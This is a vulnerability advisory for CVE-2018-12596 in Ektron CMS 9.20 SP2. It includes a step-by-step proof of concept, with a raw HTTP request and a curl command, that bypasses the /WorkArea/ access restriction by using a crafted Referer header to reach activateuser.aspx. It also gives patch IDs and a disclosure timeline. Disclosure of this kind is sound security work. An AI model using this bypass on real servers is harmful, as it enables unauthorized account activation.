Ektron CMS 9.20 SP2 Improper Access Restrictions

Ektron CMS version 9.20 SP2 suffers from an improper access restriction vulnerability.

MD5 | ca4ad2f1e7feda0dfa0819e60cce4e6b

Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596

Ektron CMS 9.20 SP2 allows remote attackers to enable users.

Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).

Proof of concept Exploit


- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request

Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:

Target: https://ektronserver.com/WorkArea/activateuser.aspx

Normally you will see a 403 Forbidden: Access denied.

Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:

"Referer: ALEX;"

Step (3): The offending GET request is:

GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Step (4): Test your GET request using curl command and burpsuite as following:

# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"

You should see now the following response 200 OK!:

HTTP/1.0 200 Connection established

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8

Now you got access to enable users, just send the repeat request into the browser using burpsuite

Have fun!

Install the latest patches available here:

PATCH ID: EKTR-508: Security enhancement for re-enabling a user

Any of the below should fix CVE-2018-12596

9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31

Disclosure policy
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.

2018a06a08: Discovered
2018a06a11: Retest staging environment
2018a06a12: Restes live environment
2018a06a19: Internal communication
2018a06a21: Vendor notification
2018a06a21: Vendor feedback
2018a06a29: Vendor feedback product will be patched
2018a06a29: Patch available
2018a06a29: Agrements with the vendor to publish the CVE/Advisory.
2018a07a30: Internal communication
2018a09a15: Patches tested on LAB environment.
2018a10a08: Public report

Discovered by:
Alex Hernandez aka alt3kx:
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074

Related Posts